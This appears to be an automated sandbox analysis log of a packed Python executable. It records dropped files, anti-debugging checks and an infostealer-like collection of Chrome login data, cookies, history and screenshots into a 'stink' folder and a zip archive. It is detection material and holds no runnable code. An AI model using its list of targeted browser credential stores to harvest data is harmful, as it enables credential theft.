                        Source: Binary string: comctl32v582.pdbGCTL source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1m 14 Dec 2021built on: Sun Dec 19 14:27:21 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: file.exe, 00000000.00000002.235504122.000000000342C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_bz2.pdb source: test.exe, 00000001.00000002.233902072.00007FFD5269F000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000002.00000002.222666433.00007FFD5269F000.00000002.00000001.01000000.00000009.sdmp
                        Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.234378780.00007FFD59271000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\A\39\b\libcrypto-1_1.pdb source: test.exe, 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_queue.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32v582.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_msi.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_lzma.pdbMM source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233760323.00007FFD5138D000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\sqlite3.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_ctypes.pdb source: test.exe, 00000001.00000002.233156751.00007FFD435C1000.00000002.00000001.01000000.0000000C.sdmp
                        Source: Binary string: The standard debugger class (pdb.Pdb) is an example. source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_sqlite3.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040422D push 5B058B48h; retn 0003h0_2_00404232
                        Source: file.exeStatic PE information: section name: .eh_fram
                        Source: file.exeStatic PE information: section name: .xdata
                        Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
                        Source: test.exe.0.drStatic PE information: section name: .eh_fram
                        Source: test.exe.0.drStatic PE information: section name: .xdata
                        Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
                        Source: vcruntime140.dll.0.drStatic PE information: section name: _RDATA
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004016D0
                        Source: file.exeStatic PE information: real checksum: 0x310de should be: 0x8cae52
                        Source: test.exe.0.drStatic PE information: real checksum: 0x1f77c9 should be: 0x956e87
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_lzma.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\python39.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ssl.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_msi.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tcl86t.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_multiprocessing.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_decimal.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_socket.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\comctl32.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_elementtree.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\select.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_bz2.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_tkinter.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_overlapped.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_queue.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\pyexpat.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\sqlite3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libssl-1_1.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_uuid.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_asyncio.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libcrypto-1_1.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_zoneinfo.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tk86t.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libffi-7.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_overlapped.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_msi.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_asyncio.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tcl86t.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_decimal.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_zoneinfo.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tk86t.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_tkinter.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE4241 rdtsc 1_2_00007FFD3FBE4241
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeAPI coverage: 1.3 %
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE3229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,1_2_00007FFD3FBE3229
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE3229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,2_2_00007FFD3FBE3229
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: test.exe, 00000001.00000002.230354520.00000000018C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE42411_2_00007FFD3FBE4241
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE572C1_2_00007FFD3FBE572C
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE42412_2_00007FFD3FBE4241
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE572C2_2_00007FFD3FBE572C
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE5A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFD3FBE5A1F
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004016D0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE4241 rdtsc 1_2_00007FFD3FBE4241
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040114B GetStartupInfoA,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,exit,_cexit,0_2_0040114B
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 1_2_00007FFD3FBE5A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFD3FBE5A1F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE5A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFD3FBE5A1F

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_e4da93291059d8fb\comctl32.dllJump to behavior
                        Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_e4da93291059d8fb\comctl32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\user-st.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Programs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Programs VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Programs\Steam VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\Programs\Steam VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\Configuration.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\Configuration.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\Configuration.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\monitor-1.png VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\monitor-1.png VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\monitor-1.png VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\Processes.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\Processes.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink\System\Processes.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\user-st.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\user-st.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\stink VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
